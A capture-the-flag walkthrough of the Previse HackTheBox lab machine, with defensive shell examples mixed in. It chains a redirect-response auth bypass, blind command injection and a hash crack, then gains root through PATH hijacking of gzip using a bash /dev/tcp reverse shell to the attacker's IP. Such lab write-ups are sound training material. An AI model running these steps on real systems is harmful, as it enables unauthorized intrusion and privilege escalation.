Previse HackTheBox WalkThrough
This is a walkthrough of the Previse HackTheBox machine. In this writeup, I demonstrate step by step how I rooted the Previse HackTheBox machine. Before starting, let us get to know something about this box. It is a Linux OS box with IP address 10.10.11.104 and difficulty level Easy, assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Previse machine by pinging its IP 10.10.11.104. If all goes correctly, then start hacking. As usual, I started by scanning the machine.
Scanning gives us an idea of how we have to proceed further. For example, it helps in banner grabbing the various services running on different ports, and sometimes it also helps in vulnerability assessment. I used nmap (a popular port scanner) for this task and the result is given below:
$ sudo nmap -sC -sV -sT -p- -oN full-tcp-port.nmap 10.10.11.104
Full port scan with nmap revealed many ports as open. We will focus mainly on ports 80 as the services running over them are well known.
OpenSSH 7.6p1 is running over port
Apache2 web server is running on port 80. Since port 80 is open and a web server is running on it, there must be a website hosted on it, which can be accessed using the URL http://10.10.11.104. We will begin our enumeration from port 80. On going to the URL http://10.10.11.104, I found a login page as shown below.
I simply tried some default credentials like password and some more, but none of them worked. Then I tried some login screen bypass SQL payloads, which also did not work. I tried fuzzing with some malicious payloads to get a verbose error message, but again everything seemed to be configured properly. If I had got a username from anywhere, I would definitely have performed a brute-force attack on this login page, since it doesn't have any rate limit implemented on it. Meanwhile, I started dirsearch in the background to find folders and files.
$ sudo dirsearch -u http://10.10.11.104/ -e all -x 402,401,403,404 -t 50
Dirsearch found many files, and most of the pages I accessed redirected me to the login page. When I tried to access the accounts.php page through the URL http://10.10.11.104/accounts.php, it redirected me to
Forced Login into Previse
Then I went to the URL http://10.10.11.104/accounts.php, captured the request in Burp Suite and tried a forced login by changing the response of the login request. The captured request of the accounts.php file is shown in the screenshot below.
Right-click on the request and capture the response to this request. Then replace 302 Found with 200 OK to force the application not to redirect to the login.php page, as shown in the screenshot given below.
On forwarding the request, it is observed that we are successfully logged in to the application.
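Swapping 302 Found for 200 OK can only render the page if the server already sent that page's content in the body of the redirect. As an added example (not part of the original walkthrough), this check flags redirect responses that still carry a body; both sample responses are constructed and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: flag 3xx responses that still carry page content.
# redirect_body_check reads one raw HTTP response on stdin and prints
# "leak" when a redirect has a non-empty body, otherwise "ok".
redirect_body_check() {
    awk '
        NR == 1          { redirect = ($2 ~ /^3[0-9][0-9]$/); next }  # status line
        !body && /^\r?$/ { body = 1; next }                           # blank line ends headers
        body             { gsub(/[ \t\r]/, ""); bytes += length($0) } # count non-blank body bytes
        END              { if (redirect && bytes > 0) print "leak"; else print "ok" }
    '
}

# Constructed sample: a protected page that sends Location but keeps rendering.
sample_leaky() {
    printf 'HTTP/1.1 302 Found\r\nLocation: login.php\r\nContent-Type: text/html\r\n\r\n'
    printf '<h2>Add New Account</h2>\n<form method="post">...</form>\n'
}

# Constructed sample: the same redirect once the handler stops right after the header.
sample_fixed() {
    printf 'HTTP/1.1 302 Found\r\nLocation: login.php\r\nContent-Length: 0\r\n\r\n'
}

sample_leaky | redirect_body_check   # prints leak
sample_fixed | redirect_body_check   # prints ok
```

On the PHP side, the corrected behaviour corresponds to ending the script (exit) immediately after sending the Location header.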
Once I logged in to the application, I tried to add a new account by registering a new user. I entered the credential test2 and, after clicking on the CREATE USER button, again captured the request in Burp Suite and modified the response as we did in the above steps.
Now we have successfully registered a user account with the credential
Let us log in to the test2 user account. After login, I saw a file upload functionality, so I uploaded a simple txt file and tried to check whether we can execute it or not. When I accessed it, it immediately started downloading. If I could somehow execute it, then my next step would be to upload a php web shell and get a reverse shell on my netcat listener. But here it is of no use.
There is a backup file present by the name SITEBACKUP.ZIP. After downloading and extracting this file I found credentials [email protected]!:) in the config.php file. Then I tried to SSH in as the root user, but it is not an SSH credential. I tried to use this password with other enumerated users like admin, etc., but all were useless.
$ cat config.php
After reviewing the source code of all the files inside SITEBACKUP.ZIP, I found the file logs.php, which uses the dangerous PHP function exec(). This function is accepting user input through the parameter delim without performing any input validation. Use of the exec() function without proper validation may lead to an OS Command Injection vulnerability. For more info about exec() check this documentation.
After some testing, I found a Blind OS Command Injection vulnerability inside this file. Since the backup file was downloaded from this website, there is a chance that the code running on the server is also vulnerable to OS command injection.
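PHP's exec() hands its string to the system shell, so the effect of an unvalidated delim can be shown in shell alone. This is an added example, not code from SITEBACKUP.ZIP: printf stands in for the real export command, and the allowed values comma, tab and space are assumptions.

```shell
#!/bin/sh
# Added example (constructed): printf stands in for the command logs.php runs.

# Weak: the value is spliced into the command string, as with
# exec("... " . $_POST['delim']), so the shell parses it as source code.
export_weak() {
    sh -c "printf 'delim=[%s]\n' $1"
}

# Better: the value travels as a positional parameter, so the shell only
# ever sees it as data (what escapeshellarg() achieves on the PHP side).
export_as_data() {
    sh -c 'printf "delim=[%s]\n" "$1"' sh "$1"
}

# Best: validate against an allowlist first, then pass the value as data.
# The three names are assumed values for this sketch.
export_safe() {
    case "$1" in
        comma|tab|space) export_as_data "$1" ;;
        *) echo "rejected"; return 1 ;;
    esac
}

probe='comma; echo INJECTED'   # harmless marker instead of a real command
export_weak "$probe"           # prints delim=[comma] then INJECTED
export_as_data "$probe"        # prints delim=[comma; echo INJECTED]
export_safe "$probe" || true   # prints rejected
export_safe tab                # prints delim=[tab]
```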
Confirming OS Command Injection
To confirm the Blind OS command injection vulnerability, we will inject a time-based OS command like the ping command in the Previse logs.php page and then capture the response of ping using tcpdump on our Kali machine.
$ sudo tcpdump -i tun0 icmp
We found that we can ping our Kali machine from the Previse machine. So here we have successfully confirmed the Blind OS Command Injection vulnerability using time-delay techniques. For more methods for exploiting OS command injection check this article from PortSwigger. Let us get a user shell by using a reverse shell one-liner. I am using the nc command for getting the reverse shell. You can use any other also. You can find a list of one-liners here.
Getting User Shell
To get a reverse shell, start a netcat listener on your Kali machine on port 9001 and put the following one-liner payload in the
$ nc -nvlp 9001
$ whoami && id
We have successfully got a reverse shell as user www-data. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # To background
$ stty raw -echo
$ fg # To put foreground
$ export TERM=xterm
Checking Listening Ports
After some enumeration, I found that port 3306 is listening locally. Port 3306 is the default port for the classic MySQL protocol (port), which is used by the MySQL Connectors, and utilities such as
$ ss -lnpt
Since we have already found the database credentials inside the config.php file, I tried them to log in to the MySQL server using the mysql command.
$ mysql -u 'root' -p
mysql> show databases;
mysql> use previse;
mysql> show tables;
mysql> SELECT * FROM accounts;
From above we found password hash of user
Identify the Hash
Before we proceed to crack this hash, we need to identify its type. Let us identify the type of the hash and then crack it to get the password. The hash appears to be of the form MD5 (Unix), Cisco-IOS $1$ (MD5), which can be confirmed from the example below.
$ hashcat --example-hashes | grep -A2 -i 'MODE: 500'
For cracking the hash, I used hashcat (a well-known offline password cracker) with the wordlist rockyou.txt (Rockyou.txt is already present in Kali & Parrot OS inside the directory
$ cat hash.txt
$ hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
The cracked password for the user m4lwhere is
Let us SSH into
$ ssh [email protected]
We are successfully logged in as m4lwhere. Let us capture user flag.
Capture User Flag
$ cat user.txt
To escalate privileges to root, we first have to find a Privilege Escalation Vector with which we can perform privilege escalation. We can find a PrivEsc vector either manually or by using post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh, and there are a lot more. This time I will go with manual enumeration.
Finding PrivEsc Vector
The sudo -l command revealed that user m4lwhere can run the script access_backup.sh with root privileges.
$ sudo -l
On analyzing the content of the access_backup.sh file, I found that the gzip command is not used with an absolute path. This introduces a Path Hijacking Vulnerability here. For more info about privilege escalation using the PATH variable, check this article.
$ cat /opt/scripts/access_backup.sh
When I tried to escalate privileges using the PATH variable, I could easily perform privilege escalation. So, here our potential PrivEsc vector is Privilege Escalation via Path Hijacking.
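The difference between a bare command name and a pinned PATH can be seen without sudo. This added example (not the box's access_backup.sh) works in a throwaway directory with a harmless decoy named gzip; the script bodies and directory names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: runs in a temporary directory, never touches sudo or the real gzip.
# path_demo prints which gzip a weak and a hardened script would pick up:
# "decoy" (caller-controlled directory) or "system" (trusted directory, or not found).
path_demo() {
    work=$(mktemp -d) || return 1
    mkdir "$work/writable"
    # Harmless decoy standing in for a file placed in a user-writable directory.
    printf '#!/bin/sh\necho decoy\n' > "$work/writable/gzip"
    chmod +x "$work/writable/gzip"

    # Weak: bare command name, looked up in whatever PATH the caller exported.
    printf '%s\n' '#!/bin/sh' 'command -v gzip' > "$work/weak.sh"

    # Hardened: the script pins PATH to root-owned directories before any lookup.
    # Calling gzip by its absolute path has the same effect for a single command.
    printf '%s\n' '#!/bin/sh' 'PATH=/usr/sbin:/usr/bin:/sbin:/bin' 'export PATH' \
        'command -v gzip' > "$work/hardened.sh"

    for name in weak hardened; do
        # Caller-controlled PATH with the writable directory in front.
        found=$(PATH="$work/writable:$PATH" sh "$work/$name.sh") || found=""
        case "$found" in
            "$work"/*) echo "$name: decoy" ;;
            *)         echo "$name: system" ;;
        esac
    done
    rm -rf "$work"
}

path_demo
```

On the sudo side, a secure_path setting in sudoers replaces the caller's PATH for commands run through sudo, which closes the same gap from the other direction.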
Getting Root Shell
To get the root shell I ran the following commands.
On Previse Machine
$ echo $PATH
$ echo '#!/bin/bash' > /tmp/gzip
$ echo 'bash -i >& /dev/tcp/10.10.17.97/9001 0>&1' >> /tmp/gzip
$ cat /tmp/gzip
$ chmod +x /tmp/gzip
$ export PATH=/tmp:$PATH
$ echo $PATH
$ sudo /opt/scripts/access_backup.sh
On Kali Machine
$ nc -nvlp 9001
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the Previse HackTheBox machine. I learnt a lot from this challenge and hope you have also learnt some new things. Thanks for reading this article. For any queries and suggestions about the walkthrough, feel free to write to us at [email protected].